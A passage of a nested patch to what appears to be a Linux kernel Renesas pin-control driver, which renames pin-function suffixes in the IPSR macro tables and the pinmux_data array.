++#define IP1SR1_27_24	FM(HRTS0_N)		FM(RTS0_N)		FM(PWM9)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_31_28	FM(HSCK0)		FM(SCK0)		FM(PWM0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* IP2SR1 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+ #define IP2SR1_3_0	FM(HRX0)		FM(RX0)			F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP2SR1_7_4	FM(SCIF_CLK)		FM(IRQ4_A)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_11_8	FM(SSI_SCK)		FM(TCLK3)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_15_12	FM(SSI_WS)		FM(TCLK4)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_19_16	FM(SSI_SD)		FM(IRQ0_A)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_23_20	FM(AUDIO_CLKOUT)	FM(IRQ1_A)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_11_8	FM(SSI_SCK)		FM(TCLK3_B)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_15_12	FM(SSI_WS)		FM(TCLK4_B)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_19_16	FM(SSI_SD)		FM(IRQ0_B)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_23_20	FM(AUDIO_CLKOUT)	FM(IRQ1_B)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP2SR1_27_24	FM(AUDIO_CLKIN)		FM(PWM3_A)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_31_28	F_(0, 0)		FM(TCLK2)		FM(MSIOF4_SS1)		FM(IRQ3_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_31_28	F_(0, 0)		FM(TCLK2_A)		FM(MSIOF4_SS1)		FM(IRQ3_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* IP3SR1 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP3SR1_3_0	FM(HRX3)		FM(SCK3_A)		FM(MSIOF4_SS2)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR1_7_4	FM(HSCK3)		FM(CTS3_N_A)		FM(MSIOF4_SCK)		FM(TPU0TO0_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR1_11_8	FM(HRTS3_N)		FM(RTS3_N_A)		FM(MSIOF4_TXD)		FM(TPU0TO1_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR1_15_12	FM(HCTS3_N)		FM(RX3_A)		FM(MSIOF4_RXD)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR1_19_16	FM(HTX3)		FM(TX3_A)		FM(MSIOF4_SYNC)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR1_3_0	FM(HRX3_A)		FM(SCK3_A)		FM(MSIOF4_SS2)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR1_7_4	FM(HSCK3_A)		FM(CTS3_N_A)		FM(MSIOF4_SCK)		FM(TPU0TO0_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR1_11_8	FM(HRTS3_N_A)		FM(RTS3_N_A)		FM(MSIOF4_TXD)		FM(TPU0TO1_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR1_15_12	FM(HCTS3_N_A)		FM(RX3_A)		FM(MSIOF4_RXD)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR1_19_16	FM(HTX3_A)		FM(TX3_A)		FM(MSIOF4_SYNC)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* SR2 */
+ /* IP0SR2 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR2_3_0	FM(FXR_TXDA)		FM(CANFD1_TX)		FM(TPU0TO2_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_7_4	FM(FXR_TXENA_N)		FM(CANFD1_RX)		FM(TPU0TO3_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_11_8	FM(RXDA_EXTFXR)		FM(CANFD5_TX)		FM(IRQ5)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_15_12	FM(CLK_EXTFXR)		FM(CANFD5_RX)		FM(IRQ4_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_3_0	FM(FXR_TXDA)		FM(CANFD1_TX)		FM(TPU0TO2_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_7_4	FM(FXR_TXENA_N_A)	FM(CANFD1_RX)		FM(TPU0TO3_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_11_8	FM(RXDA_EXTFXR)		FM(CANFD5_TX_A)		FM(IRQ5)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_15_12	FM(CLK_EXTFXR)		FM(CANFD5_RX_A)		FM(IRQ4_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP0SR2_19_16	FM(RXDB_EXTFXR)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_23_20	FM(FXR_TXENB_N)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_23_20	FM(FXR_TXENB_N_A)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP0SR2_27_24	FM(FXR_TXDB)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_31_28	FM(TPU0TO1)		FM(CANFD6_TX)		F_(0, 0)		FM(TCLK2_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_31_28	FM(TPU0TO1_A)		FM(CANFD6_TX)		F_(0, 0)		FM(TCLK2_C)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* IP1SR2 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR2_3_0	FM(TPU0TO0)		FM(CANFD6_RX)		F_(0, 0)		FM(TCLK1_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_7_4	FM(CAN_CLK)		FM(FXR_TXENA_N_X)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_11_8	FM(CANFD0_TX)		FM(FXR_TXENB_N_X)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_3_0	FM(TPU0TO0_A)		FM(CANFD6_RX)		F_(0, 0)		FM(TCLK1_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_7_4	FM(CAN_CLK)		FM(FXR_TXENA_N_B)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_11_8	FM(CANFD0_TX)		FM(FXR_TXENB_N_B)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP1SR2_15_12	FM(CANFD0_RX)		FM(STPWT_EXTFXR)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_19_16	FM(CANFD2_TX)		FM(TPU0TO2)		F_(0, 0)		FM(TCLK3_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_23_20	FM(CANFD2_RX)		FM(TPU0TO3)		FM(PWM1_B)		FM(TCLK4_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_27_24	FM(CANFD3_TX)		F_(0, 0)		FM(PWM2_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_19_16	FM(CANFD2_TX)		FM(TPU0TO2_A)		F_(0, 0)		FM(TCLK3_C)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_23_20	FM(CANFD2_RX)		FM(TPU0TO3_A)		FM(PWM1_B)		FM(TCLK4_C)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_27_24	FM(CANFD3_TX)		F_(0, 0)		FM(PWM2)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP1SR2_31_28	FM(CANFD3_RX)		F_(0, 0)		FM(PWM3_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* IP2SR2 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+@@ -375,8 +375,8 @@
+ #define IP1SR3_11_8	FM(MMC_SD_CMD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP1SR3_15_12	FM(SD_CD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP1SR3_19_16	FM(SD_WP)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_23_20	FM(IPC_CLKIN)		FM(IPC_CLKEN_IN)	FM(PWM1_A)		FM(TCLK3_X)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_27_24	FM(IPC_CLKOUT)		FM(IPC_CLKEN_OUT)	FM(ERROROUTC_N_A)	FM(TCLK4_X)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_23_20	FM(IPC_CLKIN)		FM(IPC_CLKEN_IN)	FM(PWM1_A)		FM(TCLK3_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_27_24	FM(IPC_CLKOUT)		FM(IPC_CLKEN_OUT)	FM(ERROROUTC_N_A)	FM(TCLK4_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP1SR3_31_28	FM(QSPI0_SSL)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* IP2SR3 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+@@ -712,22 +712,22 @@ static const u16 pinmux_data[] = {
+ 
+ 	/* IP0SR0 */
+ 	PINMUX_IPSR_GPSR(IP0SR0_3_0,	ERROROUTC_N_B),
+-	PINMUX_IPSR_GPSR(IP0SR0_3_0,	TCLK2_A),
++	PINMUX_IPSR_GPSR(IP0SR0_3_0,	TCLK2_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR0_7_4,	MSIOF3_SS1),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR0_11_8,	MSIOF3_SS2),
+ 
+-	PINMUX_IPSR_GPSR(IP0SR0_15_12,	IRQ3),
++	PINMUX_IPSR_GPSR(IP0SR0_15_12,	IRQ3_A),
+ 	PINMUX_IPSR_GPSR(IP0SR0_15_12,	MSIOF3_SCK),
+ 
+-	PINMUX_IPSR_GPSR(IP0SR0_19_16,	IRQ2),
++	PINMUX_IPSR_GPSR(IP0SR0_19_16,	IRQ2_A),
+ 	PINMUX_IPSR_GPSR(IP0SR0_19_16,	MSIOF3_TXD),
+ 
+-	PINMUX_IPSR_GPSR(IP0SR0_23_20,	IRQ1),
++	PINMUX_IPSR_GPSR(IP0SR0_23_20,	IRQ1_A),
+ 	PINMUX_IPSR_GPSR(IP0SR0_23_20,	MSIOF3_RXD),
+ 
+-	PINMUX_IPSR_GPSR(IP0SR0_27_24,	IRQ0),
++	PINMUX_IPSR_GPSR(IP0SR0_27_24,	IRQ0_A),
+ 	PINMUX_IPSR_GPSR(IP0SR0_27_24,	MSIOF3_SYNC),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR0_31_28,	MSIOF5_SS2),
+@@ -744,75 +744,75 @@ static const u16 pinmux_data[] = {
+ 	PINMUX_IPSR_GPSR(IP1SR0_19_16,	MSIOF5_RXD),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR0_23_20,	MSIOF2_SS2),
+-	PINMUX_IPSR_GPSR(IP1SR0_23_20,	TCLK1),
+-	PINMUX_IPSR_GPSR(IP1SR0_23_20,	IRQ2_A),
++	PINMUX_IPSR_GPSR(IP1SR0_23_20,	TCLK1_A),
++	PINMUX_IPSR_GPSR(IP1SR0_23_20,	IRQ2_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR0_27_24,	MSIOF2_SS1),
+-	PINMUX_IPSR_GPSR(IP1SR0_27_24,	HTX1),
+-	PINMUX_IPSR_GPSR(IP1SR0_27_24,	TX1),
++	PINMUX_IPSR_GPSR(IP1SR0_27_24,	HTX1_A),
++	PINMUX_IPSR_GPSR(IP1SR0_27_24,	TX1_A),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR0_31_28,	MSIOF2_SYNC),
+-	PINMUX_IPSR_GPSR(IP1SR0_31_28,	HRX1),
+-	PINMUX_IPSR_GPSR(IP1SR0_31_28,	RX1),
++	PINMUX_IPSR_GPSR(IP1SR0_31_28,	HRX1_A),
++	PINMUX_IPSR_GPSR(IP1SR0_31_28,	RX1_A),
+ 
+ 	/* IP2SR0 */
+ 	PINMUX_IPSR_GPSR(IP2SR0_3_0,	MSIOF2_TXD),
+-	PINMUX_IPSR_GPSR(IP2SR0_3_0,	HCTS1_N),
+-	PINMUX_IPSR_GPSR(IP2SR0_3_0,	CTS1_N),
++	PINMUX_IPSR_GPSR(IP2SR0_3_0,	HCTS1_N_A),
++	PINMUX_IPSR_GPSR(IP2SR0_3_0,	CTS1_N_A),
+ 
+ 	PINMUX_IPSR_GPSR(IP2SR0_7_4,	MSIOF2_SCK),
+-	PINMUX_IPSR_GPSR(IP2SR0_7_4,	HRTS1_N),
+-	PINMUX_IPSR_GPSR(IP2SR0_7_4,	RTS1_N),
++	PINMUX_IPSR_GPSR(IP2SR0_7_4,	HRTS1_N_A),
++	PINMUX_IPSR_GPSR(IP2SR0_7_4,	RTS1_N_A),
+ 
+ 	PINMUX_IPSR_GPSR(IP2SR0_11_8,	MSIOF2_RXD),
+-	PINMUX_IPSR_GPSR(IP2SR0_11_8,	HSCK1),
+-	PINMUX_IPSR_GPSR(IP2SR0_11_8,	SCK1),
++	PINMUX_IPSR_GPSR(IP2SR0_11_8,	HSCK1_A),
++	PINMUX_IPSR_GPSR(IP2SR0_11_8,	SCK1_A),
+ 
+ 	/* IP0SR1 */
+ 	PINMUX_IPSR_GPSR(IP0SR1_3_0,	MSIOF1_SS2),
+-	PINMUX_IPSR_GPSR(IP0SR1_3_0,	HTX3_A),
+-	PINMUX_IPSR_GPSR(IP0SR1_3_0,	TX3),
++	PINMUX_IPSR_GPSR(IP0SR1_3_0,	HTX3_B),
++	PINMUX_IPSR_GPSR(IP0SR1_3_0,	TX3_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR1_7_4,	MSIOF1_SS1),
+-	PINMUX_IPSR_GPSR(IP0SR1_7_4,	HCTS3_N_A),
+-	PINMUX_IPSR_GPSR(IP0SR1_7_4,	RX3),
++	PINMUX_IPSR_GPSR(IP0SR1_7_4,	HCTS3_N_B),
++	PINMUX_IPSR_GPSR(IP0SR1_7_4,	RX3_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR1_11_8,	MSIOF1_SYNC),
+-	PINMUX_IPSR_GPSR(IP0SR1_11_8,	HRTS3_N_A),
+-	PINMUX_IPSR_GPSR(IP0SR1_11_8,	RTS3_N),
++	PINMUX_IPSR_GPSR(IP0SR1_11_8,	HRTS3_N_B),
++	PINMUX_IPSR_GPSR(IP0SR1_11_8,	RTS3_N_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR1_15_12,	MSIOF1_SCK),
+-	PINMUX_IPSR_GPSR(IP0SR1_15_12,	HSCK3_A),
+-	PINMUX_IPSR_GPSR(IP0SR1_15_12,	CTS3_N),
++	PINMUX_IPSR_GPSR(IP0SR1_15_12,	HSCK3_B),
++	PINMUX_IPSR_GPSR(IP0SR1_15_12,	CTS3_N_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR1_19_16,	MSIOF1_TXD),
+-	PINMUX_IPSR_GPSR(IP0SR1_19_16,	HRX3_A),
+-	PINMUX_IPSR_GPSR(IP0SR1_19_16,	SCK3),
++	PINMUX_IPSR_GPSR(IP0SR1_19_16,	HRX3_B),
++	PINMUX_IPSR_GPSR(IP0SR1_19_16,	SCK3_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR1_23_20,	MSIOF1_RXD),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR1_27_24,	MSIOF0_SS2),
+-	PINMUX_IPSR_GPSR(IP0SR1_27_24,	HTX1_X),
+-	PINMUX_IPSR_GPSR(IP0SR1_27_24,	TX1_X),
++	PINMUX_IPSR_GPSR(IP0SR1_27_24,	HTX1_B),
++	PINMUX_IPSR_GPSR(IP0SR1_27_24,	TX1_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR1_31_28,	MSIOF0_SS1),
+-	PINMUX_IPSR_GPSR(IP0SR1_31_28,	HRX1_X),
+-	PINMUX_IPSR_GPSR(IP0SR1_31_28,	RX1_X),
++	PINMUX_IPSR_GPSR(IP0SR1_31_28,	HRX1_B),
++	PINMUX_IPSR_GPSR(IP0SR1_31_28,	RX1_B),
+ 
+ 	/* IP1SR1 */
+ 	PINMUX_IPSR_GPSR(IP1SR1_3_0,	MSIOF0_SYNC),
+-	PINMUX_IPSR_GPSR(IP1SR1_3_0,	HCTS1_N_X),
+-	PINMUX_IPSR_GPSR(IP1SR1_3_0,	CTS1_N_X),
++	PINMUX_IPSR_GPSR(IP1SR1_3_0,	HCTS1_N_B),
++	PINMUX_IPSR_GPSR(IP1SR1_3_0,	CTS1_N_B),
+ 	PINMUX_IPSR_GPSR(IP1SR1_3_0,	CANFD5_TX_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR1_7_4,	MSIOF0_TXD),
+-	PINMUX_IPSR_GPSR(IP1SR1_7_4,	HRTS1_N_X),
+-	PINMUX_IPSR_GPSR(IP1SR1_7_4,	RTS1_N_X),
++	PINMUX_IPSR_GPSR(IP1SR1_7_4,	HRTS1_N_B),
++	PINMUX_IPSR_GPSR(IP1SR1_7_4,	RTS1_N_B),
+ 	PINMUX_IPSR_GPSR(IP1SR1_7_4,	CANFD5_RX_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR1_11_8,	MSIOF0_SCK),
+-	PINMUX_IPSR_GPSR(IP1SR1_11_8,	HSCK1_X),
+-	PINMUX_IPSR_GPSR(IP1SR1_11_8,	SCK1_X),
++	PINMUX_IPSR_GPSR(IP1SR1_11_8,	HSCK1_B),
++	PINMUX_IPSR_GPSR(IP1SR1_11_8,	SCK1_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR1_15_12,	MSIOF0_RXD),
+ 
+@@ -821,15 +821,15 @@ static const u16 pinmux_data[] = {
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR1_23_20,	HCTS0_N),
+ 	PINMUX_IPSR_GPSR(IP1SR1_23_20,	CTS0_N),
+-	PINMUX_IPSR_GPSR(IP1SR1_23_20,	PWM8_A),
++	PINMUX_IPSR_GPSR(IP1SR1_23_20,	PWM8),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR1_27_24,	HRTS0_N),
+ 	PINMUX_IPSR_GPSR(IP1SR1_27_24,	RTS0_N),
+-	PINMUX_IPSR_GPSR(IP1SR1_27_24,	PWM9_A),
++	PINMUX_IPSR_GPSR(IP1SR1_27_24,	PWM9),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR1_31_28,	HSCK0),
+ 	PINMUX_IPSR_GPSR(IP1SR1_31_28,	SCK0),
+-	PINMUX_IPSR_GPSR(IP1SR1_31_28,	PWM0_A),
